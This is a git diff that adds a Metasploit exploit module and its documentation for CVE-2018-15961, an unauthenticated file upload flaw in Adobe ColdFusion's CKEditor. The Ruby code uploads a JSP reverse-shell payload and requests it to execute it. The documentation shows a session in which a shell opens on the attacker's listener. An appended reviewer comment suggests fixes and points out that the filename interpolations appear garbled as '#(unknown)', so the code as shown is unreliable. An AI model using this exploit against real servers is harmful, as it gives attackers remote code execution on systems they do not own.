diff --git a/documentation/modules/exploit/multi/http/coldfusion_ckeditor_file_upload.md b/documentation/modules/exploit/multi/http/coldfusion_ckeditor_file_upload.md
new file mode 100644
index 0000000000..e84b7d0ca2
--- /dev/null
+++ b/documentation/modules/exploit/multi/http/coldfusion_ckeditor_file_upload.md
@@ -0,0 +1,48 @@
+## Description
+
+A file upload vulnerability in the CKEditor of Adobe ColdFusion 11
+(Update 14 and earlier), ColdFusion 2016 (Update 6 and earlier), and
+ColdFusion 2018 (July 12 release) allows unauthenticated remote
+attackers to upload and execute JSP files through the filemanager
+plugin. Tested on Adobe ColdFusion 2018 v2018.0.0.310739.
+
+## Vulnerable Application
+
+ColdFusion 11 (Update 14 and earlier),
+ColdFusion 2016 (Update 6 and earlier), and
+[ColdFusion 2018 (July 12 release)](https://bintray.com/eaps/coldfusion/cf%3Acoldfusion/2018.0.0)
+
+## Verification Steps
+
+1. `./msfconsole -q`
+2. `use exploit/multi/http/coldfusion_ckeditor_file_upload`
+3. `set rhosts `
+4. `set lhost `
+5. `exploit`
+6. Get a shell
+
+## Scenarios
+
+### Tested on Coldfusion 2018 v2018.0.0.310739
+
+```
+msf5 > use exploit/multi/http/coldfusion_ckeditor_file_upload
+msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > set rhosts 172.22.222.142
+rhosts => 172.22.222.142
+msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > set lhost 172.22.222.136
+lhost => 172.22.222.136
+msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) > exploit
+
+[*] Started reverse TCP handler on 172.22.222.136:4444
+[*] Uploading the JSP payload at /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/ASMK.jsp...
+[+] Upload succeeded! Executing payload...
+[*] Command shell session 1 opened (172.22.222.136:4444 -> 172.22.222.142:43262) at 2019-01-10 06:30:52 -0600
+
+whoami
+cfuser
+uname -a
+Linux 6bd4238e7ffb 4.15.0-38-generic #41-Ubuntu SMP Wed Oct 10 10:59:38 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
+exit
+[*] 172.22.222.142 - Command shell session 1 closed.
+msf5 exploit(multi/http/coldfusion_ckeditor_file_upload) >
+```
diff --git a/modules/exploits/multi/http/coldfusion_ckeditor_file_upload.rb b/modules/exploits/multi/http/coldfusion_ckeditor_file_upload.rb
new file mode 100644
index 0000000000..a45c207b2f
--- /dev/null
+++ b/modules/exploits/multi/http/coldfusion_ckeditor_file_upload.rb 
@@ -0,0 +1,93 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+ include Msf::Exploit::Remote::HttpClient
+
+ Rank = ExcellentRanking
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Adobe ColdFusion CKEditor unrestricted file upload',
+ 'Description' => %q{
+ A file upload vulnerability in the CKEditor of Adobe ColdFusion 11
+ (Update 14 and earlier), ColdFusion 2016 (Update 6 and earlier), and
+ ColdFusion 2018 (July 12 release) allows unauthenticated remote
+ attackers to upload and execute JSP files through the filemanager
+ plugin.
+ Tested on Adobe ColdFusion 2018.0.0.310739.
+ },
+ 'Author' =>
+ [
+ 'Pete Freitag de Foundeo', # Vulnerability discovery
+ 'Vahagn vah_13 Vardanian', # First public PoC
+ 'Qazeer' # Metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'CVE', '2018-15961' ],
+ [ 'BID', '105314' ],
+ [ 'URL', 'https://helpx.adobe.com/fr/security/products/coldfusion/apsb18-33.html' ]
+ ],
+ 'Privileged' => false,
+ 'Platform' => %w{ linux win },
+ 'Arch' => ARCH_JAVA,
+ 'Targets' =>
+ [
+ [ 'Java Universal',
+ {
+ 'Arch' => ARCH_JAVA,
+ 'Platform' => %w{ linux win },
+ 'Payload' => { 'DisableNops' => true },
+ 'DefaultOptions' => {'PAYLOAD' => 'java/jsp_shell_reverse_tcp'}
+ }
+ ]
+ ],
+ 'DefaultTarget' => 0,
+ 'DefaultOptions' => { 'RPORT' => 8500 },
+ 'DisclosureDate' => 'Sep 11 2018'
+ ))
+
+ register_options [
+ OptString.new('TARGETURI', [ false, 'Base application path', '/' ]),
+ ]
+ end
+
+ def exploit
+ filename = rand_text_alpha_upper(1..10) + '.jsp'
+
+ print_status("Uploading the JSP payload at #{target_uri}cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/#(unknown)...")
+
+ mime = Rex::MIME::Message.new
+ mime.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#(unknown)\"")
+ mime.add_part('path', 'text/plain', nil, 'form-data; name="path"')
+
+ post_str = mime.to_s
+ post_str.strip!
+
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri, 'cf_scripts','scripts','ajax','ckeditor','plugins','filemanager','upload.cfm'),
+ 'version' => '1.1',
+ 'method' => 'POST',
+ 'ctype' => 'multipart/form-data; boundary=' + mime.bound,
+ 'data' => post_str,
+ })
+
+ unless res && res.code == 200
+ fail_with Failure::Unknown, 'Upload Failed...'
+ end
+
+ print_good('Upload succeeded! Executing payload...')
+
+ send_request_cgi({
+ 'uri' => normalize_uri(target_uri, 'cf_scripts', 'scripts', 'ajax',
+ 'ckeditor', 'plugins', 'filemanager', 'uploadedFiles', filename),
+ 'method' => 'GET'
+ }, 5)
+
+ end
+end
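Review bot: The progress message in exploit builds the upload path by plain interpolation, `#{target_uri}cf_scripts/...`, while both requests go through normalize_uri(target_uri, ...), so the path printed to the log and the path actually requested disagree whenever TARGETURI is set without a trailing slash; build the message with the same helper, `print_status("Uploading the JSP payload at #{normalize_uri(target_uri, 'cf_scripts', 'scripts', 'ajax', 'ckeditor', 'plugins', 'filemanager', 'uploadedFiles', filename)}...")`. The failure branch also collapses every non-success outcome into `Failure::Unknown`; a nil response is the host not answering and a response that arrived with another status is an unexpected reply, and telling them apart makes the module's log output far easier to interpret, e.g. `fail_with(Failure::Unreachable, 'No response from upload.cfm') unless res` followed by `fail_with(Failure::UnexpectedReply, "Upload failed (HTTP #{res.code})") unless res.code == 200`. As rendered here the two filename interpolations in print_status and the multipart header read `#(unknown)`; that looks like a rendering artifact for `#{filename}`, but if the file really contains that literal text the name sent in the form and the name fetched by the later GET would not match.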